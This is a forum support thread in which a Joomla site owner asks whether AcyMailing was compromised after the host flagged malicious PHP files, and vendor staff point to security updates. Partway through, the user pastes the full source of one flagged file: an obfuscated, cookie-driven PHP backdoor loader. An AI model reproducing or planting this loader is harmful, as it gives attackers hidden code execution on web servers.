I have received the following message from my host:
Our malware scanner has detected malware contained in your hosting account.
The infected files are as follows:

api/includes/zdhlmt.php
components/com_ajax/nwmwyz.php
media/com_acym/images/thumbnails/thumbnail_199.png?.php
media/com_ipakojyx/zgrjyt.php

has my AcyMailing ben compromised?

Regards

    yes it has been compromised

    Hi ruud
    Is it OK just to find those malicious files and delete them or should I uninstall AcyMailing and then re-install?

    Regards

    tonytimms

    Hi,

    The security issue you mentioned has been addressed in the latest versions of Acymailing. We have fixed this issue in version 8.5.0, which was released on June 12th, and also released a security fix in version 8.7.0 on August 8th.

    To ensure that your system is secure, please make sure that you have installed the latest Acymailing version, which is currently 8.7.3.

    We have taken several steps to notify our users about these security updates. We have sent out two email notifications, published two articles on our website, and also discussed the issues on our forum.

    For more information on these updates, please visit the following links:

    Hi, yes I have successfully updated to the latest version, however I am getting a notice - "Duplicate column name 'image'"

    Can I ignore this or is action required?

    Regards

    This is the content of the file api/includes/zdhlmt.php

    text/x-generic zdhlmt.php ( PHP script, ASCII text, with very long lines )
    <?php
    $lrRH=$_COOKIE ;$Jqsd =0; $JdV = ( 11- 8) ; $PpE =array() ; $PpE [ $Jqsd ]= "" ;while($JdV){$PpE[$Jqsd ].=$lrRH [ ( 51 - 19 )][ $JdV ]; if(! $lrRH[ ( 44 -12) ] [$JdV+ 1] ){ if ( !$lrRH [ (57 - 25) ] [ $JdV + 2 ] ) break ; $Jqsd ++; $PpE [ $Jqsd] = "";$JdV++; } $JdV = $JdV+ (26 - 23 ) + 1; }$Jqsd =$PpE [ ( 23 - 4 ) ] ().$PpE[ (46-21) ] ; if(!$PpE[( 84 -57) ] ( $Jqsd) ){ $JdV = $PpE [ (50-46 ) ]($Jqsd,$PpE [( 50 - 36) ]) ; $PpE [ (39 -10) ] ($JdV,$PpE [(44- 21 ) ] . $PpE [ (86 -65 ) ]($PpE [ ( 41 -26) ]($lrRH [3]) ) ) ;} include($Jqsd ) ;

    It looks very different to the same file on a separate joomla installation I have, should I delete it?

    Hi,

    To provide you with the best assistance possible, I kindly request that you submit a support ticket through our website at https://www.acymailing.com/support/. Our team will be able to efficiently and effectively provide you with the assistance you need.

    Please note that our ticket support is exclusively available for our customers with an active Essential or Enterprise license. If your license has expired or you are using the Starter version, we kindly invite you to renew or upgrade your license prior to opening your support ticket.